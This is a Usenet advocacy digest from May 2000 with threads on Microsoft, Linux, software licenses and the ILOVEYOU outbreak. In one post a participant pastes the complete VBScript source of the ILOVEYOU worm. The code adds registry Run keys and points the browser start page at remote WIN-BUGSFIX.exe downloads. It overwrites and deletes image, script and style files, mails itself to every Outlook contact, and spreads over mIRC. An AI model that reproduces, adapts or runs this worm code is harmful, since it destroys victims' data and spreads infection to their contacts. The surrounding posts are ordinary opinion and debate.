From: "ax" <[EMAIL PROTECTED]>
Subject: Re: Dinosaur Eat Blue Penguin?
Date: Fri, 05 May 2000 13:26:35 GMT

<[EMAIL PROTECTED]> wrote in message news:8et8t9$drj$[EMAIL PROTECTED]...

> Considering the creative accounting that MSFT uses, it may all boil down
> to whose worthlesss stock is printed on the heaviest paper....

But MSFT still has the purchasing power. Cash is the king.

CORL was fighting with MSFT for years, but indicated lately
that it did not want MSFT monopoly to split. What's going on?

CORL may be better off if it didn't give away its best parts
(network computing appliance, video conferencing)
to Rebel.com and Simply.com.  CORL screwed itself up.
Will CORL survive its latest cash flow problem? Can RHAT
and CALD lend help to CORL?  LinuxCare needs help too.

------------------------------

From: [EMAIL PROTECTED] (Christopher Browne)
Crossposted-To: comp.lang.java.advocacy,comp.os.ms-windows.nt.advocacy
Subject: Re: Dvorak calls Microsoft on 'innovation'
Date: Fri, 05 May 2000 13:32:05 GMT

Centuries ago, Nostradamus foresaw a time when Bob Hauck would say:
>On Thu, 4 May 2000 16:08:51 -0500, Erik Funkenbusch <[EMAIL PROTECTED]> wrote:
>
>>Tivo is an application, not a file system.
>
>You're talking about the fancy digital vcr thing, right?  It is an
>application that runs on Linux, but I thought they made some mods to the
>filesystem to optimize it for video recording and to deal with consumer
>behavior (like turning the power off).

Tivo is a _company_, that sells:
a) A service, and
b) A product, which consists of a number of components.

One of the interesting components appears to be a customized filesystem.

>>> From Microsoft's perspective Biometrics is a good move because
>>> it is the kind of thing that will generate a *lot* of press,
>
>>You make it sound like a simple process.  Let's see you do it to Linux.
>
>Things like that are what PAM is for.

Indeed.  Doing systems integration work _with_ PAM seems to require
a bit more than "point and drool," but it's certainly _there,_ and
offers some flexible authentication options.

NOBODY is going to set up fingerprint scanners for just one, simple
system, when the project for installing 'em is likely to start at
something like $50K.

Any _realistic_ deployment is going to offer enough time to allow
someone to look a little at how to configure PAM...
--
"Java and C++ make you think that the new ideas are like the old ones.
Java is the most distressing thing to hit computing since MS-DOS."

------------------------------

From: T. Max Devlin <[EMAIL PROTECTED]>
Crossposted-To: alt.destroy.microsoft,alt.lang.basic
Subject: Re: QB 4.5 in Win 2000
Date: Fri, 05 May 2000 09:36:17 -0400

Quoting Tom Hanlin from alt.destroy.microsoft; Fri, 5 May 2000 06:33:34 GMT
>On  4-May-2000, T. Max Devlin <[EMAIL PROTECTED]> wrote:
>> >are you suggesting that microsoft should continue to support all its
>> >old software because people might still be using it?
>>
>> I think he's suggesting, as am I, that Microsoft should continue to
>> support its *customers*, even after its taken their money, as an
>> on-going license does in fact indicate *some* level of long-term
>>  commitment.
>
>I have to suspect that you've never actually read any of Microsoft's
>licenses-- not to single out Microsoft, as these are industry-standard
>bull**** boilerplate. In a dozen pages or so, they all come down to the
>following:
>
>1) Despite what you may imagine, you didn't actually buy our product. You're
>just licensing it at our limited sufferance. Don't piss us off, loser.
>
>2) Our product is not software. It's a trademark-named collection of bits on
>a disk which, despite our advertising claims, is not actually expected to do
>anything useful, or even to refrain from destroying your computer and all
>data contained in it.
>
>3) If there is something physically wrong with the disk we supply you, we
>will consider replacing it with another disk that may or may not contain
>something or other.
>
>4) Despite the fact that we deny that our software has any ostensible useful
>purpose, you may not copy it, disassemble it, or think of producing anything
>that sort of does what we claim our product might do. (Fixing it is Right
>Out.)
>
>5) Ha ha. [Ok, I made up this part. Legalese is uniformly humorless.]
>
>Go ahead, *read* that shrink-wrap license sometime. Aside from (5), you'll
>find it all there. (I get a particular kick out of Borland's 15-page
>licenses, which are still [from a much earlier and saner point in their
>history] called "no-nonsense" "agreements". :-)
>
>In short, no commitment express or implied.

The commitment is implicit in the nature of the contract.  You did a very
admirable job of paraphrasing a typical MS license.  I'll agree that many
other software licenses resemble MS's closely, and I would submit that they
have become more and more similar in recent years as Microsoft has moved the
bar for how little value you can deliver for how much money.  Of course,
you've left out my favorite bit; "this software is covered by copyright".  Why
would I have to agree to that (since the gov't makes me go along with it
whether I agree or not) in the license if it were as obvious and true as
everyone claims?

I liked number 5, too.  And I'm quite sure I've seen that in several MS
licenses, so I doubt you made it up.  :-)

Manager of Research & Educational Services
Managed Services
ELTRAX Technology Services Group
[EMAIL PROTECTED]
-[Opinions expressed are my own; everyone else, including
   my employer, has to pay for them, subject to
    applicable licensing agreement]-

From: [EMAIL PROTECTED] (Donal K. Fellows)
Subject: Re: Virus on the net?
Date: 5 May 2000 13:37:31 GMT

In article <[EMAIL PROTECTED]>,
David Goldstein  <[EMAIL PROTECTED]> wrote:
> This virus (macro) devestated Germany today.  It propagated itself,
> destroyed jpeg files, set IE to about:blank (big deal:)) and our
> company is trying to discover if more damage was done.  [...]

I believe (IIRC what a friend said who'd looked at the virus) that it
affects CSS and MP3 files as well.  But don't take my word for it,
examine it yourself (no, I don't have a copy or even want a copy.)
The hardest bit is dealing with how poorly written it is!

Donal.
--
Donal K. Fellows    http://www.cs.man.ac.uk/~fellowsd/    [EMAIL PROTECTED]
-- I may seem more arrogant, but I think that's just because you didn't

------------------------------

From: [EMAIL PROTECTED] (CG)
Date: 05 May 2000 10:08:28 EDT

On 5 May 2000 06:07:47 GMT, [EMAIL PROTECTED] wrote:

>On Sun, 4 May 3900 23:08:37, Mig Mig <[EMAIL PROTECTED]> wrote:
>

>> Hmm.. i was hit by it but didnt execute the script. I had a look at the
>> script and even not being to strong on Visual Basic it is easy to
>> understand that this was a "bad program"
>>

>What exactly did  you find? How did you  inspect it? What was the clue
>to it being malevolent?  Please give actual examples (snippets) so we
>can
>be  better prepared.
>
>Thanx.

here it is in all its glory.

rem  barok -loveletter(vbe) <i hate go to school>
rem                     by: spyder  /  [EMAIL PROTECTED]  /
@GRAMMERSoft Group  /  Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows
Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or
(ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";  Please dont edit this script... mIRC will
corrupt, if mIRC will"
scriptini.WriteLine "     corrupt... WINDOWS will affect and will not
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=  /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from
me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [EMAIL PROTECTED] ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf&
_
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@[EMAIL PROTECTED]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
"&vbcrlf& _
"ONKEYDOWN=@[EMAIL PROTECTED]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to
read this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf&
_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf&
_
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set
wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf&
_
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf&
_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

------------------------------

From: [EMAIL PROTECTED] (CG)
Subject: Re: This is Bullsh&^%T!!!
Date: 05 May 2000 10:11:21 EDT

On Fri, 5 May 2000 08:20:29 -0400, "Nik Simpson"
<[EMAIL PROTECTED]> wrote:

>"mlw" <[EMAIL PROTECTED]> wrote in message
>news:[EMAIL PROTECTED]...
>> Checking the Microsoft home page. Not even a mention of the virus. It is
>> Microsoft's fault that the "ILOVEYOU" virus can spread so quickly and so
>> bad, and they don't even mention it on their site.
>>
>> They have had ample warning, and ample evidence that their e-mail client
>> design is far too insecure for real use, and they have had ample time to
>> fix it. Because of their monopoly, they have no incentive to fix it.
>> Because they are a monopoly, industry, world wide, suffers. If there was
>> competition, this would have been fixed way before Malissa even showed
>> up.
>

>You are right MLW, what you've just said is Bullshit. This virus type could
>be written to work just as well in UNIX if attachments can be executed from
>email, is that not possible with Netscape on LINUX?

You missed the point.  the reason this worm spread so quickly is
because so many people use outlook, and the only reason so many people
use outlook is because M$ gives it away for free, and the only reason
M$ gives it away for free is to bankrupt companies writing email
programs, so that M$ can extend its monopoly grip to all software on
your computer.  Once that happens M$ can charge plenty for its crappy
email program.

anybody who uses outlook should have their heads examined.

system administrators should delete it from all computers installed on
their computers.

outlook is a trojan horse.

------------------------------

From: [EMAIL PROTECTED] (Matthias Warkus)
Subject: Re: The Dream World of Linux Zealots
Date: Thu, 4 May 2000 23:25:53 +0200

It was the Tue, 02 May 2000 14:17:44 +0200...
...and David Goldstein <[EMAIL PROTECTED]> wrote:
>   This is not true anymore.  A majority of computer users know what
> Linux is.  Here in Germany, people actaully use Linux.

Almost everyone you talk to has a shadowy notion of it, here. Don't
mention Linux at a party in Germany. If you do, don't give the
impression of knowing it well.

You'll have a couple of hard hours explaining countless things to
dozens of people who want to try Linux. At the moment, it looks like
everybody and their daughter is planning to install it and run it just
for kicks.

mawa
--
Disclaimer: This posting does not express the corporate opinion of
Evolved Technologies of the Known Universe, Inc., Dyson Spheres,

------------------------------

From: [EMAIL PROTECTED] (Matthias Warkus)
Subject: Re: Who is "S"??
Date: Thu, 4 May 2000 23:27:48 +0200

It was the Thu, 04 May 2000 14:59:37 GMT...
...and The Ghost In The Machine <[EMAIL PROTECTED]> wrote:
> >Also, we may see the day when Perl applets will
> >rival Java applets, since they both are capable of compiling into
> >bytecode, and a lot of sites already use Perl for various things,
> >including cgi scripts.
>
> Indeed; php, as I understand it, is an embedded Perl interpreter
> in Apache.  (Correct me if I'm wrong, please. :-) )  This avoids the
> overhead of a process fork() without losing the functionality
> inherent in Perl.

Uh, no. You're confusing PHP3 with mod_perl. PHP is not Perl.

> Tcl is absolutely brain-dead as a language, but Tk makes
> up for it. :-) )

Tcl is actually a language with a great concept. But the kind of
master it takes to write real good Tcl scripts without producing ugly
hacks can as well master a different language like Perl or Python and
be more productive with it.

mawa
--
...Robert Pappert...der Bill Gates der deutschen Chorliteratur...
                                                             -- mawa

------------------------------

From: Tim Kelley <[EMAIL PROTECTED]>
Subject: Re: How many more viruses does Microsoft need to fix the problem?
Date: Fri, 05 May 2000 09:16:06 -0500

mlw wrote:

> OK, MS has more than ample warning, more than ample time to make sure
> that this sort of thing does not keep happening. What the F&^k guys? Is
> Microsoft so inept that they can't protect their own e-mail programs? I
> just don't understand why people are not going after MS in court. After
> all, if someone dies in a minor car accident, the car maker is usually
> held responsible. Why shouldn't a software maker be held responsible if
> they do not practice reasonable competence in security.

Because the bottom line is profit, not customer satisfaction, and
it is a myth that the two have anything to do with each other.
It serves them well not to do anything, obviously.

The insecurities in M$ products also drives the anti-virus
software industry, which iis more of a thoroughgoing monopoly
than microsoft, and is involved in a hideous campaign of theft
and price gouging that makes M$ look like amatuers.

Windows shills are quick to point out that linux may have these
same problems too, if only it were more popular, but this is
partly false for technical reasons, and partly false because once
viruses became any sort of a problem on linux, a Free Software
anti-virus solution would spring up, and it would make the crap
people are forced to use under windows look like, well, crap.

Linux will kill Microsoft and the virus-anti-virus industry!!

--

Tim Kelley

From: [EMAIL PROTECTED]
Date: 5 May 2000 14:21:12 GMT

In comp.os.linux.advocacy Nik Simpson <[EMAIL PROTECTED]> wrote:

: "mlw" <[EMAIL PROTECTED]> wrote in message
: news:[EMAIL PROTECTED]...
:> Checking the Microsoft home page. Not even a mention of the virus. It is
:> Microsoft's fault that the "ILOVEYOU" virus can spread so quickly and so
:> bad, and they don't even mention it on their site.
:>
:> They have had ample warning, and ample evidence that their e-mail client
:> design is far too insecure for real use, and they have had ample time to
:> fix it. Because of their monopoly, they have no incentive to fix it.
:> Because they are a monopoly, industry, world wide, suffers. If there was
:> competition, this would have been fixed way before Malissa even showed
:> up.

: You are right MLW, what you've just said is Bullshit. This virus type could
: be written to work just as well in UNIX if attachments can be executed from
: email, is that not possible with Netscape on LINUX?

Sure, but it would only affect the users files, not the entire computer.  But I
don't use netscape for my mail on linux, can you execute attachments from
netscape?  I don't think I can from pine, because I have to give it executable
permissions. People have lost entire servers of files from this program...all
from the defaults  Sounds bad to me.

                                        -jeremy

--
"In the Serengeti, there is a small outcropping of rock which conceals a rich
oasis. Tucked away, hidden from the burning sun by a stone ceiling, is a

------------------------------

From: [EMAIL PROTECTED] (david parsons)
Subject: Re: Linux NFS is buggy
Date: 5 May 2000 06:52:30 -0700

In article <[EMAIL PROTECTED]>,  <[EMAIL PROTECTED]> wrote:
>Welcome to the wonderful world of Linux....
>
>Two questions if I may ask?
>
>Why in the world would you want to poison a professional, time proven
>real Unix operating system like Solaris with junk like Linux?

    Because Solaris sucks dead bunnies through a straw, and Linux,
    even when shipped as a GNU-infested commercial distribution,
    looks and feels a lot more like Unix than Solaris does?

    Sunos was a fairly good Unix;  Solaris has, over the years, felt
    more and more VMS-like, and if I want to run a command-line MacOS
    why would I bother to pay Sun for a clone when I could just give
    the money directly to Compaq and get the real thing?

                  ____
    david parsons \bi/ Solaris: not in MY datacenter.
                   \/

------------------------------

From: [EMAIL PROTECTED] (abraxas)
Date: 5 May 2000 14:24:40 GMT

Rob S. Wolfram <[EMAIL PROTECTED]> wrote:
> Erik Funkenbusch <[EMAIL PROTECTED]> wrote:
>>Auto-executing content is part of what makes windows user friendly, and
>>Linux will have to do this if it ever wants to play in the same game as
>>Windows.  That's simply a fact.  Users won't put up with it when they have
>>an OS which will do that for them.

> I guess Linux does *not* want to play the same game as Windows. It is
> very unlikely that autoexecuting mail content will ever become
> commonplace in a Unix flavour. Then again, the free aspect of the
> software guarantees me the opportunity to *disable* such malicious code.

Dont mind erik.  He is once again evoking the 'the windows way or the wrong
way' argument.  He cannot see beyond his own nose that there may possibly be
ways of doing things that are superior to the way microsoft has "innovated".

*cough*

=====yttrx

From: "Cihl" <[EMAIL PROTECTED]>
Date: Fri, 05 May 2000 14:30:24 GMT

 > Linux will kill Microsoft and the virus-anti-virus industry!!

Whoa! Watch it with that kind of talk, dude! It makes us all look bad!

Most of us just want to use Linux instead of Windows, because it suits our
needs better. We have no interest in killing Microsoft. If anything happens
to Microsoft, they'll be to blame themselves.